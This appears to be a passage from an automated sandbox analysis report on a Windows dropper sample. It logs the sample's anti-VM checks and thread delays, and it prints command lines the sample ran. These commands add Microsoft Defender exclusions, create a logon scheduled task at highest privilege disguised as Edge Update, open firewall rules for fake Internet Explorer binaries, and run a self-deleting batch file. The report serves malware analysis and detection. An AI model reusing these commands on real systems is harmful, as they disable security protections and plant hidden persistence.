Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3520Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3260Thread sleep count: 1803 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5676Thread sleep count: 100 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1168Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\PING.EXELast function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: Amcache.hve.22.drBinary or memory string: VMware
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeBinary or memory string: #(VmCIJ
Source: Amcache.hve.22.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.22.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.22.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.22.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.22.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.22.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.22.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.22.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.22.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.22.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.22.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: netsh.exe, 0000001D.00000002.2060794340.000002BF320C7000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000001D.00000003.2059762065.000002BF320C4000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000020.00000003.2143575388.000001C2804D5000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000023.00000003.2252352867.0000017EA7EA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.22.drBinary or memory string: vmci.sys
Source: Amcache.hve.22.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.22.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.22.drBinary or memory string: \driver\vmci,\driver\pci
Source: netsh.exe, 00000017.00000002.1979187876.0000023570068000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
Source: Amcache.hve.22.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.22.drBinary or memory string: VMware20,1
Source: Amcache.hve.22.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.22.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.22.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.22.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.22.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.22.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.22.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.22.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.22.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.22.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.22.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess queried: DebugPortJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeProcess token adjusted: Debug
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAA-BD9C-FC4F0859F018}" /f
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /f
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Process created: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe "C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Process created: C:\ProgramData\Microsoft\Bound.exe "C:\ProgramData\Microsoft\Bound.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\selfdelete.bat""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAA-BD9C-FC4F0859F018}" /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /f
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe | Process created: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe "C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Process created: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe "C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
Source: C:\ProgramData\Microsoft\Bound.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall delete rule name=all dir=in program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe'"
Source: C:\ProgramData\Microsoft\Bound.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall delete rule name=all dir=out program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe'"
Source: C:\ProgramData\Microsoft\Bound.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall add rule name='Allow Internet Explorer Inbound' dir=in action=allow program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe' enable=yes profile=private,public"
Source: C:\ProgramData\Microsoft\Bound.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall add rule name='Allow Internet Explorer Outbound' dir=out action=allow program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe' enable=yes profile=private,public"
Source: C:\ProgramData\Microsoft\Bound.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp8B5F.tmp.bat""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name=all dir=in "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name=all dir=out "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule "name=Allow Internet Explorer Inbound" dir=in action=allow "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" enable=yes profile=private,public
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule "name=Allow Internet Explorer Outbound" dir=out action=allow "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" enable=yes profile=private,public
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\ProgramData\Microsoft\Bound.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -noprofile -executionpolicy bypass -command "netsh advfirewall firewall add rule name='allow internet explorer inbound' dir=in action=allow program='c:\programdata\microsoft\internet explorer\iexplore.exe' enable=yes profile=private,public"
Source: C:\ProgramData\Microsoft\Bound.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -noprofile -executionpolicy bypass -command "netsh advfirewall firewall add rule name='allow internet explorer outbound' dir=out action=allow program='c:\programdata\microsoft\internet explorer\iexplore.exe' enable=yes profile=private,public"
Source: C:\ProgramData\Microsoft\Bound.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -noprofile -executionpolicy bypass -command "netsh advfirewall firewall add rule name='allow internet explorer inbound' dir=in action=allow program='c:\programdata\microsoft\internet explorer\iexplore.exe' enable=yes profile=private,public"
Source: C:\ProgramData\Microsoft\Bound.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -noprofile -executionpolicy bypass -command "netsh advfirewall firewall add rule name='allow internet explorer outbound' dir=out action=allow program='c:\programdata\microsoft\internet explorer\iexplore.exe' enable=yes profile=private,public"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe | Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe | Queries volume information: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\misc VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformation
Source: C:\ProgramData\Microsoft\Bound.exe | Queries volume information: C:\ProgramData\Microsoft\Bound.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe | Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\ucrtbase.dll VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\ProgramData\Microsoft\Internet Explorer VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\_ctypes.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\_bz2.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe | Queries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\__init__.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\__init__.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\__init__.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\__init__.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
